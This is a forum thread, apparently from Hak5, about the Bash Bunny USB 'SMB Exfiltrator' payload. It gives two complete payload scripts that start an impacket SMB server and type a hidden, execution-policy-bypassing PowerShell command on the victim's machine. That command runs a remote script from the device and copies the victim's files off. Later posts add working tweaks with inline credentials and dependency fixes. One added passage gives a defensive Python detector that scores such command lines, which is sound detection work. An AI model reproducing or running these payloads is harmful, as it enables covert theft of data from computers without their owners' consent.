jblk01 Posted June 18, 2019

Was having the blinking blue LED issue like a few other commenters, decided to fsck around and see what's what. Fixed it and added SMBv2 support to the script, with no changes made to the PowerShell script (s.ps1). @Darren Kitchen any chance these changes can be reflected on the official Github repo?

#!/bin/bash
# LED STATUS
# ==========
# FAIL........Failed to find dependencies
# STAGE2......Ethernet Stage
# SETUP.......HID Stage
# SPECIAL.....Receiving Files
# CLEANUP.....Moving Liberated Files
# FINISH......Finished
#
# OPTIONS
# =======
# Exfiltration options configured from included s.ps1 script

######## INITIALIZATION ########
REQUIRETOOL impacket
GET SWITCH_POSITION

# Make temporary loot directory
mkdir -p /loot/smb/

# Delete any old exfiltration data
rm -rf /loot/smb/*

# Copy new powershell payload to smb share
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/

# Make loot directory on USB Disk
mkdir -p /root/udisk/loot/smb_exfiltrator

######## ETHERNET STAGE ########
LED STAGE2
ATTACKMODE RNDIS_ETHERNET

# Start the SMB Server
python /tools/impacket/examples/smbserver.py -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &

# Re-enable ICMP/echo replies to trip the powershell stager
echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all

######## HID STAGE ########
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
GET HOST_IP
LED SETUP
ATTACKMODE HID RNDIS_ETHERNET
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
LED B 100

# Wait until files are done copying.
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

######## CLEANUP ########
LED CLEANUP

# Delete EXFILTRATION_COMPLETE file
rm -rf /loot/smb/EXFILTRATION_COMPLETE

# Move files to udisk loot directory
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator

# Clean up temporary loot directory
rm -rf /loot/smb/e/*

# Sync file system
sync

######## FINISH ########
# Trap is clean
LED FINISH
Foxtrot Posted June 28, 2019

Hi, Is there a PR on GitHub open for this?
joeservo Posted June 12, 2021

The above didn't work for me, Windows 10. I had to edit this line and pass the username and password:

RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) {NET USE \\172.16.64.1\IPC$ /u:root hak5bunny; \\\\$HOST_IP\\s\\s.ps1; exit;}; sleep 1; }\""

Specifically this part: NET USE \\172.16.64.1\IPC$ /u:root hak5bunny;
jblk01 Posted July 4, 2021 (Author)

Hey @joeservo, sorry that I'm late. I realized that I partially rewrote the script and didn't share it here, I apologize for that. Here it is for both you and others if need be:

#!/bin/bash
#
# Title: Faster SMB Exfiltrator version 2.0
# Author: Hak5Darren
# Props: ImNatho, mike111b, madbuda, jblk01
# Version: 1.6.1
# Category: Exfiltration
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, Ethernet
#
# REQUIREMENTS
# ============
# SETUP:
#
# 1. apt update ; apt install gcc
# 2. pip install impacket
# 3. cd /tools/
# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
#
#
# LED STATUS
# ==========
# FAIL........Failed to find dependencies
# STAGE1......Ethernet Stage
# STAGE2......HID Stage
# SPECIAL.....Receiving Files
# CLEANUP.....Moving Liberated Files
# FINISH......Finished
#
# OPTIONS
# =======
# Exfiltration options configured from included s.ps1 script

######## INITIALIZATION ########
REQUIRETOOL impacket
GET SWITCH_POSITION

# Make temporary loot directory
mkdir -p /loot/smb/

# Delete any old exfiltration data
rm -rf /loot/smb/*

# Copy new powershell payload to smb share
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/

# Make loot directory on USB Disk
mkdir -p /root/udisk/loot/smb_exfiltrator

######## ETHERNET STAGE ########
LED STAGE1
ATTACKMODE RNDIS_ETHERNET

# Start the SMB Server
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &

######## HID STAGE ########
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
GET HOST_IP
LED STAGE2
ATTACKMODE HID RNDIS_ETHERNET
RUN WIN powershell
Q DELAY 1000
Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
Q DELAY 500
Q ENTER
LED SPECIAL

# Wait until files are done copying
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

######## CLEANUP ########
LED CLEANUP

# Delete EXFILTRATION_COMPLETE file
rm -rf /loot/smb/EXFILTRATION_COMPLETE

# Move files to udisk loot directory
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator

# Clean up temporary loot directory
rm -rf /loot/smb/e/*

# Sync file system
sync

######## FINISH ########
# Trap is clean
LED FINISH
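Seen from the host being monitored, both payload versions in this thread leave the same small footprint in process-creation telemetry: a hidden, execution-policy-bypassing PowerShell that runs a .ps1 from a UNC path on the Bunny's RNDIS address (172.16.64.1, what the payloads read as HOST_IP) and, in the rewritten version, a net use with the password inline. The following is an added example, not from any post here nor from the Hak5 payload, that scores a few constructed command lines against those indicators; the sample lines and the 172.16.64.0/24 range are my assumptions.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample process-creation command lines (e.g. Sysmon Event ID 1 CommandLine); not real telemetry.
SAMPLE_CMDLINES = [
    # mirrors the first payload version in this thread
    'powershell -WindowStyle Hidden -Exec Bypass "While ($true) { If ((New-Object '
    'net.sockets.tcpclient (172.16.64.1,445)).Connected) { \\\\172.16.64.1\\s\\s.ps1; exit } }"',
    # mirrors the rewritten (4 July) version
    'powershell -windowstyle hidden -exec bypass "net use \\\\172.16.64.1\\s /u:user Password01; '
    'powershell -windowstyle hidden -exec bypass \\\\172.16.64.1\\s\\s.ps1; exit"',
    # benign: an admin mapping a corporate file server
    'net use Z: \\\\fileserver01.corp.example\\share /persistent:yes',
    # benign: a local script run with a relaxed execution policy
    'powershell -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1',
]

# Assumption: the Bunny's RNDIS link puts the host in 172.16.64.0/24
# (the payloads above hardcode 172.16.64.1 as HOST_IP).
BUNNY_NET = ip_network("172.16.64.0/24")

INDICATORS = [  # each match adds one point; the RNDIS-address check is separate
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"net\s+use\b.*\s/u(?:ser)?:\S+\s+\S+", re.I), "net use with inline credentials"),
    (re.compile(r"\\\\[^\s\"]+\.ps1\b"), ".ps1 run straight from a UNC share"),
]
UNC_IPV4 = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\")  # \\1.2.3.4\share ...

def in_bunny_net(host):
    try:
        return ip_address(host) in BUNNY_NET
    except ValueError:  # an octet > 255 slipped past the loose regex
        return False

def rndis_unc_hosts(cmdline):
    # IPv4 hosts referenced as UNC paths that sit inside the RNDIS range
    return {h for h in UNC_IPV4.findall(cmdline) if in_bunny_net(h)}

def score(cmdline):
    """Return (score, reasons) for one command line."""
    reasons = [why for rx, why in INDICATORS if rx.search(cmdline)]
    rndis = rndis_unc_hosts(cmdline)
    if rndis:
        reasons.append("UNC path into RNDIS range: " + ", ".join(sorted(rndis)))
    return len(reasons), reasons

def suspicious(cmdlines, threshold=3):
    return [i for i, c in enumerate(cmdlines) if score(c)[0] >= threshold]
```

With the default threshold of 3 only the two payload-shaped lines are flagged; the benign net use and local script each score below it.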
KinderRiegel Posted July 14, 2021

Hello @jblk01, it didn't work for me on Windows 10. The LED is blinking blue, and this for hours.. I got this in run:

powershell -WindowStyle Hidden -Exec Bypass "While ($true) { If ((New-Object net.sockets.tcpclient (172.16.64.1,445)).Connected) { \\
chrizree Posted July 14, 2021

Which version of the payload did you use? The first one posted or the rewritten one further down? The string you are referring to is part of the first post/version, but not the second (newer) one. Try the rewritten one posted on the 4th of July instead.
KinderRiegel Posted July 21, 2021

Yes, I use this version from the 4th of July. The blue LED is blinking and blinking and blinking... It creates the folder in loot but nothing more... I use the Bash Bunny Mark II. Any ideas?
KinderRiegel Posted July 21, 2021

When I start the SMB server manually I get this error:

root@bunny:~# python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
[1] 9623
root@bunny:~# usage: smbserver.py [-h] [-comment COMMENT] [-debug] [-smb2support] shareName sharePath
smbserver.py: error: unrecognized arguments: -username -password s /loot/smb

The content of the smbserver.log:

GNU nano 2.2.6 File: smbserver.log

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
chrizree Posted July 21, 2021

In what way did you get Impacket onto the Bunny? Downloaded from Github as per the instructions in the post from the 4th of July or installed using deb package? Your log indicates an older version (0.9.16-dev) than the payload script expects (0.9.19).
KinderRiegel Posted July 21, 2021

Yes, I have installed it using the deb package. Okay, thanks. I will try to install it per the instructions.
KinderRiegel Posted July 21, 2021

Can I uninstall the 0.9.16-dev on the Bash Bunny? Or do I just have to copy the new version from GitHub? After copying the new version, this is the content of the smbserver.log:

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

But when I try to start the SMB server I get this:

[1] 2243
root@bunny:/loot# Traceback (most recent call last):
  File "/tools/impacket/examples/smbserver.py", line 85, in <module>
    server.addCredential(options.username, 0, lmhash, nthash)
AttributeError: SimpleSMBServer instance has no attribute 'addCredential'
chrizree Posted July 21, 2021

I'd suggest you reset the Bunny and start over fresh. Then follow the instructions to the point to get the correct and intended versions of any dependency.
KinderRiegel Posted July 21, 2021

Yeah, I think that's the best. Thank you 🙂
KinderRiegel Posted July 21, 2021

Can anyone tell me how I get to the factory reset? The introduction for the Bash Bunny does not work for the Bash Bunny Mark 2.
chrizree Posted July 22, 2021

I answered in the other thread you created.
jblk01 Posted July 23, 2021 (Author)

Hi @KinderRiegel, I was seeing the same error as you and I found a workaround:

Make sure your internet connection is shared with the Bunny. Then on the Bunny:

First, do 'timedatectl set-time' followed by the current year, month and date. Then, go into the /tools/impacket/ directory and run 'pip install -r requirements.txt'. For me, this failed on a few requirements so I had to go in and:

pip2 install setuptools-rust
pip2 install cryptography
wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg
rm -f pyasn1-0.4.8-py2.7.egg
wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz
tar -xzvf pycryptodomex-3.10.1.tar.gz
cd pycryptodomex-3.10.1 && python setup.py install
cd /tools/impacket/ && python setup.py install

And from there it was working properly. 🙂
KinderRiegel Posted July 23, 2021

@jblk01 Thanks for it. Now it works, amazing 🙂